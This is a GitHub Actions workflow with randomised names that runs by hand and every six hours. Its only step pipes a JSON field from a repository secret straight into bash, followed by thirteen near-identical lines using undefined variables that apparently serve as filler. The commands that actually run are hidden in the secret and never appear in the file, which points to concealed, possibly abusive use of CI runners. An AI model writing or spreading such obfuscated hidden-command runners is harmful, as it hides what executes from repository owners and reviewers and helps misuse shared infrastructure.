name: yanfusu1932

on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanfusu1932
        env:
          ys1: ${{ secrets.ys1 }}
        run: |
          echo $ys1 | jq -r .qwa5 | /bin/bash
          echo $ezz847 | jq -r .iuv206 | /bin/bash
          echo $vctsl127 | jq -r .zgkeu7 | /bin/bash
          echo $fs9 | jq -r .jdmi363 | /bin/bash
          echo $p494 | jq -r .jx09603 | /bin/bash
          echo $smozy5784 | jq -r .hex749 | /bin/bash
          echo $y8 | jq -r .dnjg59 | /bin/bash
          echo $l838 | jq -r .xc650 | /bin/bash
          echo $vgubt40452 | jq -r .owrj9000 | /bin/bash
          echo $jp225 | jq -r .zesf62 | /bin/bash
          echo $bn772 | jq -r .w41221 | /bin/bash
          echo $r59502 | jq -r .bqb23699 | /bin/bash
          echo $q50926 | jq -r .lzmfu39233 | /bin/bash
          echo $m30026 | jq -r .iu93 | /bin/bash

